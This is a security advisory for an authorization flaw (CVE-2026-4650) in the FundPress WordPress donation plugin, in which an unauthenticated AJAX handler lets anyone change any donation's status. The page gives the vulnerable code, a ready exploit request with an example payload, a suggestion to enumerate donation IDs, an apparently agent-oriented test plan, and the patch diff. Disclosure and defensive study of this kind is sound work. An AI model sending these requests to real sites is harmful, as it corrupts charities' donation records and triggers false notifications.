FundPress <= 2.0.8 - Missing Authorization to Unauthenticated Arbitrary Donation Status Modification via donate_action_status AJAX Handler
Description
The FundPress – WordPress Donation Plugin for WordPress is vulnerable to authorization bypass in versions up to and including 2.0.8. This is due to missing authorization and nonce verification in the donate_action_status() AJAX handler, which is registered to be accessible to unauthenticated users via wp_ajax_nopriv. The function only validates that the schema parameter equals 'donate-ajax' and that the required POST parameters are present, but fails to verify user capabilities, nonce tokens, or donation ownership. This makes it possible for unauthenticated attackers to modify the status of any donation by providing its ID (which are sequential integers and easily enumerable), allowing them to mark donations as completed, pending, cancelled, or any arbitrary status, potentially triggering email notifications and related side effects.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
What Changed in the Fix
Changes introduced in v2.0.9
Source Code
WordPress.org SVN# Research Plan: CVE-2026-4650 - FundPress Arbitrary Donation Status Modification ## 1. Vulnerability Summary The **FundPress** plugin (versions <= 2.0.8) contains a missing authorization and nonce verification vulnerability within its AJAX handler for updating donation statuses. The function `dona…
Show full research plan
Research Plan: CVE-2026-4650 - FundPress Arbitrary Donation Status Modification
1. Vulnerability Summary
The FundPress plugin (versions <= 2.0.8) contains a missing authorization and nonce verification vulnerability within its AJAX handler for updating donation statuses. The function donate_action_status() in inc/class-dn-ajax.php is registered for unauthenticated access (wp_ajax_nopriv) but fails to verify if the requester has administrative privileges or if they own the donation being modified. Furthermore, it lacks a security nonce check, allowing any user to change the status of any donation by simply knowing or guessing its integer ID.
2. Attack Vector Analysis
- Endpoint:
http://<target>/wp-admin/admin-ajax.php - Action:
donate_action_status - URL Parameter (GET):
schema=donate-ajax(Required for the initial check) - Post Parameters (POST):
donate_id: The integer ID of the donation post (post typedn_donate).status: The desired status suffix (e.g.,completed,pending,cancelled).
- Authentication: None (Unauthenticated).
- Preconditions: A donation (post type
dn_donate) must exist in the system.
3. Code Flow
- Entry Point: An AJAX request hits
admin-ajax.phpwithaction=donate_action_status. - Hook Registration: In
inc/class-dn-ajax.php, the__constructmethod registers the action:$actions = array(..., 'donate_action_status' => true,); foreach ( $actions as $action => $nopriv ) { add_action( 'wp_ajax_' . $action, array( $this, $action ) ); if ( $nopriv ) { add_action( 'wp_ajax_nopriv_' . $action, array( $this, $action ) ); } } - Validation (Minimal): The
donate_action_status()function performs basic checks:if ( ! isset( $_GET['schema'] ) || DN_Helpper::DN_sanitize_params_submitted( $_GET['schema'] ) !== 'donate-ajax' || empty( $_POST ) ) { return; } if ( ! isset( $_POST['donate_id'] ) || ! isset( $_POST['status'] ) ) { return; } - The Sink: The function instantiates
DN_Donateand callsupdate_status():
There is no$donate_id = ( isset( $_POST['donate_id'] ) ) ? absint( $_POST['donate_id'] ) : ''; $status = ( isset( $_POST['status'] ) ) ? DN_Helpper::DN_sanitize_params_submitted( $_POST['status'] ) : ''; $donate = DN_Donate::instance( $donate_id ); if ( $donate ) { $donate->update_status( 'donate-' . $status . '' ); // Vulnerable Update wp_send_json( array( 'status' => 'success', 'action' => $status ) ); die(); }current_user_can()check and nowp_verify_nonce()call.
4. Nonce Acquisition Strategy
Based on the source code analysis of inc/class-dn-ajax.php, the donate_action_status() function does not implement a nonce check.
While other functions like donate_load_form() check for $_POST['nonce'] and verify it against thimpress_donate_nonce, donate_action_status() omits this check entirely. Therefore, no nonce is required to exploit this specific vulnerability.
5. Exploitation Strategy
The exploit involves sending a single unauthenticated POST request to the AJAX endpoint.
- Request Method: POST
- Target URL:
http://<target>/wp-admin/admin-ajax.php?action=donate_action_status&schema=donate-ajax - Headers:
Content-Type: application/x-www-form-urlencoded
- Body:
donate_id=<TARGET_DONATION_ID>&status=completed
Example Payload:donate_id=123&status=completed
6. Test Data Setup
To verify the exploit, the following environment must be prepared:
- Create a Campaign: Use WP-CLI to create a campaign post.
wp post create --post_type=dn_campaign --post_title="Save the Whales" --post_status=publish - Create a Donation: Use WP-CLI to create a donation post.
# Create a donation with ID 100 (or capture the ID returned) DONATE_ID=$(wp post create --post_type=dn_donate --post_title="Donation #1" --post_status=donate-pending --porcelain) echo "Target Donation ID: $DONATE_ID" - Check Initial Status: Confirm it is
donate-pending.wp post get $DONATE_ID --field=post_status
7. Expected Results
- Response Status Code: 200 OK
- Response Body:
{"status":"success","action":"completed"} - Side Effect: The
post_statusof the targetdn_donatepost will be updated fromdonate-pendingtodonate-completed.
8. Verification Steps
After performing the HTTP request via the agent's tool, verify the database state using WP-CLI:
# Query the post status of the targeted donation
wp post get <DONATE_ID> --field=post_status
The expected output is donate-completed.
9. Alternative Approaches
If completed status does not trigger the expected behavior or if the system uses different status slugs, try other common FundPress statuses:
status=processing(Results indonate-processing)status=failed(Results indonate-failed)status=cancelled(Results indonate-cancelled)
If the ID is unknown, an attacker would typically perform an enumeration attack (e.g., iterating donate_id from 1 to 5000) as donation IDs are standard WordPress post IDs and often sequential.
Summary
The FundPress plugin for WordPress is vulnerable to unauthenticated arbitrary donation status modification due to missing authorization and nonce checks in the 'donate_action_status' AJAX handler. Attackers can exploit this to mark any donation as completed, pending, or cancelled by enumerating sequential donation IDs.
Vulnerable Code
// inc/class-dn-ajax.php lines 30-48 $actions = array( 'donate_load_form' => true, 'donate_submit' => true, 'donate_remove_compensate' => true, 'donate_action_status' => true, ); foreach ( $actions as $action => $nopriv ) { if ( ! method_exists( $this, $action ) ) { return; } add_action( 'wp_ajax_' . $action, array( $this, $action ) ); if ( $nopriv ) { // ... add_action( 'wp_ajax_nopriv_' . $action, array( $this, $action ) ); } } --- // inc/class-dn-ajax.php lines 164-184 public function donate_action_status() { if ( ! isset( $_GET['schema'] ) || DN_Helpper::DN_sanitize_params_submitted( $_GET['schema'] ) !== 'donate-ajax' || empty( $_POST ) ) { return; } if ( ! isset( $_POST['donate_id'] ) || ! isset( $_POST['status'] ) ) { return; } $donate_id = ( isset( $_POST['donate_id'] ) ) ? absint( $_POST['donate_id'] ) : ''; $status = ( isset( $_POST['status'] ) ) ? DN_Helpper::DN_sanitize_params_submitted( $_POST['status'] ) : ''; $donate = DN_Donate::instance( $donate_id ); if ( $donate ) { $donate->update_status( 'donate-' . $status . '' ); wp_send_json( array( 'status' => 'success', 'action' => $status ) ); die(); }
Security Fix
@@ -30,8 +30,8 @@ $actions = array( 'donate_load_form' => true, 'donate_submit' => true, - 'donate_remove_compensate' => true, - 'donate_action_status' => true, + //'donate_remove_compensate' => true, + //'donate_action_status' => true, ); foreach ( $actions as $action => $nopriv ) { @@ -113,8 +113,9 @@ /** * Remove campaign compensate. + * @deprecated not using. */ - public function donate_remove_compensate() { + /*public function donate_remove_compensate() { if ( ! isset( $_GET['schema'] ) || DN_Helpper::DN_sanitize_params_submitted( $_GET['schema'] ) !== 'donate-ajax' || empty( $_POST ) ) { return; } @@ -148,7 +149,7 @@ 'message' => __( 'Could not delete compensate. Please try again.', 'fundpress' ) ) ); die(); - } + }*/ /** * must login @@ -160,8 +161,9 @@ /** * Update order donate status. + * @deprecated not using. */ - public function donate_action_status() { + /*public function donate_action_status() { if ( ! isset( $_GET['schema'] ) || DN_Helpper::DN_sanitize_params_submitted( $_GET['schema'] ) !== 'donate-ajax' || empty( $_POST ) ) { return; } @@ -187,7 +189,7 @@ ) ); die(); - } + }*/ } }
Exploit Outline
To exploit this vulnerability, an unauthenticated attacker can send a POST request to the WordPress AJAX endpoint with the following parameters: 1. Endpoint: /wp-admin/admin-ajax.php?action=donate_action_status&schema=donate-ajax 2. POST Body: donate_id=<DONATION_ID>&status=<NEW_STATUS> 3. The 'donate_id' corresponds to the WordPress Post ID of the 'dn_donate' post type. 4. The 'status' parameter is appended to the 'donate-' prefix (e.g., providing 'completed' results in a status of 'donate-completed'). 5. Since donation IDs are sequential integers, an attacker can iterate through IDs to modify every donation in the system without any authentication or CSRF protection.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.